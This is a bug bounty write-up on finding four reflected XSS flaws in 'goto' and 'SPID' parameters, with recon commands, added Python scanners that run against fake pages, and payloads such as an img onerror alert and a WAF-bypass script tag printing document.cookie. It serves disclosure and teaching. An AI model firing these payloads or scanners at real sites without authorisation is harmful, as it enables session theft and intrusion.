How I was able to find 4 Cross-site scripting (XSS) on vulnerability disclosure program ?

source: https://medium.com/@DrakenKun/how-i-was-able-to-find-4-cross-site-scripting-xss-on-vulnerability-disclosure-program-e2f39199ae16


Last updated 1 year ago

Hello, I'm Amr Mustafa, AKA DrakenKun.

Today I'll explain how I found these reflected XSS vulnerabilities.

First, I will list the tools I used during this process:

  1. ParamSpider

  2. gau

  3. kxss

  4. Arjun

Let's say our target domain is called example.com.

I used ParamSpider to find some interesting parameters:

python3 paramspider.py -d example.com -o parameters.txt

We got a large number of parameters. Now we want to see, for each of them, whether it is reflected and which characters come back unfiltered, and this is where kxss comes in.

I just typed:

cat parameters.txt | kxss

Some interesting parameters were found here.

A parameter vulnerable to XSS should have these characters reported as Unfiltered: [ " ' < > $ | ( ) ` : ; { } ]
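
The check kxss performs on each parameter is worth seeing spelled out. The following is an added example, not code from this write-up or from kxss itself: for every query parameter it first sends a plain marker to see whether the value is reflected at all, then sends each special character separately between two markers and records which ones come back verbatim. The HTTP layer is a constructed fake (`fake_fetch`) that imitates a login page reflecting `goto` raw and `q` HTML-escaped, so the script runs offline; the URL and parameter names are assumptions.

```python
"""kxss-style reflection check: for each query parameter, which special characters
come back in the response unencoded. Added example, not code from the write-up or
from kxss; the HTTP layer is a constructed fake so it runs offline."""
import html
from urllib.parse import urlsplit, urlunsplit, parse_qsl, urlencode

# The character set kxss reports on. Seeing " ' < > among them is what makes a
# parameter worth a manual XSS attempt; the rest matter in JS-string contexts.
KXSS_CHARS = "\"'<>$|()`:;{}"
PREFIX, SUFFIX = "kxss", "ssxk"   # constructed markers so a reflection is unambiguous


def fake_fetch(url: str) -> str:
    """Constructed stand-in for an HTTP GET (swap in requests.get(url).text for real use).
    Simulates a login page that reflects `goto` raw into an attribute and reflects
    `q` HTML-escaped; any other parameter is ignored."""
    params = dict(parse_qsl(urlsplit(url).query, keep_blank_values=True))
    goto = params.get("goto", "")
    q = html.escape(params.get("q", ""))
    return f'<input type="hidden" name="goto" value="{goto}"><p>Results for {q}</p>'


def with_param(url: str, name: str, value: str) -> str:
    """Return `url` with every occurrence of query parameter `name` set to `value`,
    percent-encoded, leaving the other parameters untouched."""
    parts = urlsplit(url)
    pairs = [(k, value if k == name else v)
             for k, v in parse_qsl(parts.query, keep_blank_values=True)]
    return urlunsplit(parts._replace(query=urlencode(pairs)))


def unfiltered_chars(url: str, fetch=fake_fetch) -> dict:
    """Return {param: [chars reflected verbatim]} for each parameter that reflects at all.
    Characters are probed one at a time, as kxss does, so a WAF that blocks one
    combination does not hide the others."""
    result = {}
    names = {k for k, _ in parse_qsl(urlsplit(url).query, keep_blank_values=True)}
    for name in sorted(names):
        if PREFIX + SUFFIX not in fetch(with_param(url, name, PREFIX + SUFFIX)):
            continue  # value never appears in the response: not a reflection candidate
        result[name] = [c for c in KXSS_CHARS
                        if PREFIX + c + SUFFIX in fetch(with_param(url, name, PREFIX + c + SUFFIX))]
    return result


if __name__ == "__main__":
    target = "https://example.com/login.jsp?goto=/home&q=test&lang=en"  # constructed URL
    for param, chars in unfiltered_chars(target).items():
        print(f"URL: {target} Param: {param} Unfiltered: {chars}")
```

Against the fake page, `goto` reports all thirteen characters while `q` reports only those that HTML escaping leaves alone, and `lang` is not listed at all because it is never reflected. A full Unfiltered list tells you the value lands somewhere unencoded, not where; the payload still has to fit the context (attribute value, tag body, script string) the reflection lands in.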

I noticed that I got 2 interesting vulnerable parameters named "goto" on different endpoints.

Let's say the 2 links are:

  1. example.com/login.jsp?goto=

  2. cloud.example.com/login.html?goto=

I just visited the URL and injected my simple payload into the parameter:

"><img%20src=x%20onerror="alert(%27POC%20By%20DrakenKun%27)"

I also typed the same payload into the other URL, and JavaScript did its job :)

I reported these two vulnerabilities on Bugcrowd with some satisfaction.

Exactly 1 day later,

I asked myself: OK, you have 2 vulnerable parameters, both called "goto" and both exploitable for XSS,

so how about trying to find more parameters with the same name?!

I simply used Google dorks and typed:

site:"example.com" inurl:"?goto="

I got some results, but unfortunately they weren't vulnerable!

I gave it another chance.

Quite simply, all I wanted was to find any parameter called "goto" to get another chance at finding new XSSes. For that I used a beautiful tool called gau (get all urls), which fetches known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, Common Crawl and URLScan for a given domain, inspired by Tomnomnom's waybackurls:

gau example.com | grep "?goto="
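
The pivot above (one vulnerable parameter name, hunted across every archived URL for the domain) is worth doing with a real query parser rather than a plain `grep "?goto="`, which only matches when `goto` is the first parameter and is case-sensitive. The following is an added example, not code from the write-up or from gau: it parses each URL, keeps those carrying the parameter anywhere in the query (case-insensitive), deduplicates on host, path and parameter-name set so each endpoint shape is tested once, and sets the target parameter to a placeholder ready for payload injection. The URL list is constructed to look like gau output and is not real data.

```python
"""Pivot on a parameter name across an archive URL list (gau / waybackurls output).
Added example, not code from the write-up; the URL list is constructed, not real gau output."""
from urllib.parse import urlsplit, urlunsplit, parse_qsl, urlencode

# Constructed sample of the kind of lines `gau example.com` prints.
GAU_OUTPUT = """\
https://example.com/login.jsp?goto=/account
https://example.com/login.jsp?goto=/settings
https://example.com/login.jsp?lang=en&goto=/account
http://cloud.example.com/login.html?GOTO=https%3A%2F%2Fexample.com%2F
https://example.com/static/app.js?v=123
https://sso.example.com/auth?client_id=web&goto=https://example.com/dash
https://example.com/login.jsp?goto=
"""


def urls_with_param(lines, name: str, placeholder: str = "FUZZ"):
    """Yield one URL per distinct (host, path, parameter-name set) whose query carries
    `name` anywhere (not only as the first parameter), compared case-insensitively,
    with that parameter's value replaced by `placeholder` ready for payload injection."""
    want = name.lower()
    seen = set()
    for line in lines:
        line = line.strip()
        if not line:
            continue
        parts = urlsplit(line)
        pairs = parse_qsl(parts.query, keep_blank_values=True)
        if not any(k.lower() == want for k, _ in pairs):
            continue
        key = (parts.netloc.lower(), parts.path, tuple(sorted(k.lower() for k, _ in pairs)))
        if key in seen:
            continue  # same endpoint with the same parameter shape is already queued
        seen.add(key)
        new_pairs = [(k, placeholder if k.lower() == want else v) for k, v in pairs]
        yield urlunsplit(parts._replace(query=urlencode(new_pairs)))


def naive_grep_hits(lines, name: str) -> int:
    """Count of lines a plain `grep "?name="` would match, for comparison."""
    return sum(f"?{name}=" in line for line in lines)


if __name__ == "__main__":
    lines = GAU_OUTPUT.splitlines()
    for u in urls_with_param(lines, "goto"):
        print(u)
    print(f'grep "?goto=" would have matched {naive_grep_hits(lines, "goto")} of these lines')
```

On the constructed list the parser yields four distinct endpoints to test, while `grep "?goto="` matches only three lines and misses `&goto=` and `GOTO=` entirely; the two `cloud`/`sso` hosts are exactly the kind of extra endpoint the pivot is meant to surface.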

I visited every result and started injecting JavaScript payloads.

And guess what happened?

Yeah :)

I got the third XSS with a basic payload to bypass the WAF:

<%2FScriPt><sCripT+class%3DDrakenKun>document.write(document.cookie);<%2FsCriPt>

Now we have 3 :D

The 3 XSSes are on 3 different endpoints.

I visited them again and started looking for any other parameters to test.

Here I used a tool called Arjun:

arjun -u https://example.com/login.jsp

I got some parameters here and started injecting into every one of them.

One of these parameters is called "SPID", and I noticed that both characters "<" and ">" were reflected in the source code!

And I quickly started typing my payload:
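
Arjun finds parameters the page accepts but never links to by sending candidate names and watching for a change in the response. The following is an added example, not Arjun's code or the author's: it sends a constructed wordlist in chunks against a baseline response, bisects any chunk that changes the page until single names remain, and then runs the raw-reflection check for `<` and `>` that made `SPID` interesting above. The target is a constructed fake (`fake_fetch`) that silently honours `SPID` and `debug`; the URL, wordlist and parameter behaviour are assumptions, not facts about the real program target.

```python
"""Arjun-style hidden parameter discovery by response diffing with bisection, followed
by the raw-reflection check that made `SPID` interesting. Added example, not Arjun's
code nor the write-up's; the target is a constructed fake so it runs offline."""
from urllib.parse import urlsplit, urlunsplit, parse_qsl, urlencode

CANARY = "ar7unX"   # constructed marker value sent for every candidate parameter

# Constructed wordlist; Arjun ships a much larger one.
WORDLIST = ["id", "page", "redirect", "SPID", "user", "token",
            "debug", "lang", "next", "ref", "view", "callback"]


def fake_fetch(url: str) -> str:
    """Constructed stand-in for an HTTP GET. The page quietly honours two parameters
    not linked anywhere: `SPID` is reflected unescaped, `debug` adds a comment."""
    params = dict(parse_qsl(urlsplit(url).query, keep_blank_values=True))
    body = "<html><body><form action='/login.jsp'><input name='user'></form>"
    if "SPID" in params:
        body += f"<input type='hidden' name='SPID' value='{params['SPID']}'>"
    if "debug" in params:
        body += "<!-- debug mode -->"
    return body + "</body></html>"


def with_params(url: str, extra) -> str:
    """Append (name, value) pairs to the URL's query string, percent-encoded."""
    parts = urlsplit(url)
    pairs = parse_qsl(parts.query, keep_blank_values=True) + list(extra)
    return urlunsplit(parts._replace(query=urlencode(pairs)))


def discover_params(url: str, wordlist, fetch=fake_fetch, chunk: int = 25) -> list:
    """Return the candidate names whose presence changes the response. Names are sent
    in chunks; a chunk that differs from the baseline is split in half and re-sent
    until single names remain, so the request count stays far below one per name."""
    baseline = fetch(url)
    found = []

    def probe(names):
        body = fetch(with_params(url, [(n, CANARY) for n in names]))
        if body == baseline:
            return           # none of these names influences the page
        if len(names) == 1:
            found.append(names[0])
            return
        mid = len(names) // 2
        probe(names[:mid])
        probe(names[mid:])

    for i in range(0, len(wordlist), chunk):
        probe(wordlist[i:i + chunk])
    return sorted(found)


def reflects_raw(url: str, name: str, fetch=fake_fetch, probe_value: str = "<x>") -> bool:
    """True when the probe value (angle brackets by default) comes back unencoded."""
    return probe_value in fetch(with_params(url, [(name, probe_value)]))


if __name__ == "__main__":
    target = "https://example.com/login.jsp"   # constructed URL
    for p in discover_params(target, WORDLIST):
        print(p, "reflects < > raw" if reflects_raw(target, p) else "accepted, not reflected")
```

Two caveats for real targets that the fake hides: responses usually carry changing content (CSRF tokens, timestamps, request IDs), so Arjun fetches the baseline more than once and compares stable features rather than the exact body used here; and the bisection assumes parameters act independently, which a page that only changes when two parameters appear together will defeat.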

"><img%20src=x%20onerror="alert(%27POC%20By%20DrakenKun%27)"

And Boom !!

I tried that on the other endpoints, but I found nothing.

I reported these 4 vulnerabilities and, Alhamdulillah, all of them were accepted as Unresolved.

Thank U ❤


You can follow me on Twitter to get some useful information.